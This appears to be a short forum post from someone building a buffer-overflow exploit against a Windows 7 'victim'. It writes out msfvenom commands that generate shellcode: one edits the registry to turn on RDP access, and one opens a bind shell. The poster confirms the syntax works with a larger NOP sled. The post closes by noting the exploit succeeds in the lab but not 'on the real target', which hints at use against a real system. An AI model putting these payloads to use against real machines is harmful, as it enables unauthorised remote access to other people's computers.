I am crafting a BOF and trying to use MSFvenom’s windows/exec payload to do a regedit turning on RDP access.
I have tried:
msfvenom -p windows/exec CMD='reg add "HKEY_LOCAL_MACHINE\\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' -f c -b "\x00\x0a\x0d\x20"
I know the BOF works because it can call calc.exe shellcode. So I have replaced it with the above and it won’t work.
Any suggestions? What am I missing? This is for a Win 7 machine as a victim.
I have also tried:
msfvenom -p windows/shell/bind_tcp -f c -b "\x00\x0a\x0d\x20" RHOST=X LPORT=X
This also does not work.
Edit: Disregard. Those are the correct syntax for them. I just needed to make my NOP sled bigger.
Now to find out why it works on my lab but not on the real target.